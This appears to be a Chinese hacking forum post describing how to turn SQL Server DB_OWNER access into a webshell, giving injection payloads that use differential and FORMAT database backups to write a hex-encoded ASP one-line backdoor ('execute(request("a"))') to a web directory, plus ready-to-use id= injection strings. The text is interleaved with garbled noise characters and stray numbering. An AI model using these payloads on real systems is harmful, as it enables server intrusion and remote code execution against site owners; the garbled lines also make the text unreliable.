DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
6 N  v- |# x# u/ K4 ^! F3 m% _
减少备份文件大小，得到可执行的webshell成功率提高不少
$ Y% t2 y' A8 O9 M一利用差异备份
加一个参数WITH DIFFERENTIAL
1 y  p- j9 `; n2 C
* h) Q  d8 u3 R5 k& S1 A1
2
4 _7 u7 q) y: M3
4
' }: _% y1 i9 M" G. J declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
  b' p8 z: r; T) Q/ \. T) E8 Kcreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

二利用完全FORMAT
加一个参数WITH FROMAT
: c- R8 Q- t, ^! B+ k( m1 C- h6 P有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
4 ]# S2 i4 {% Q% y9 T% V
1
5 c7 M7 F' `7 u) J2
/ J7 Q5 I  n: P& E3
4
7 m6 h$ d$ P; _; B/ c+ V6 I declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
' _) x1 h! L9 A9 ^+ n# j" r- H- Icreate table [dbo].[xiaolu] ([cmd] [image]);
: k+ N2 X: M8 r3 Y% ninsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
) A2 M3 Q6 W: t! E$ |declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

# z- L* [1 F" U, B. f( f/ N" I总的来说就是那么简单几句,下面以备份数据库model为例子
1

1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

2

! F; v. S9 K" r: K  `" b1
id=1;backup database model to disk='你的路径‘ with differential,format;--
6 f3 F: t8 A4 z% v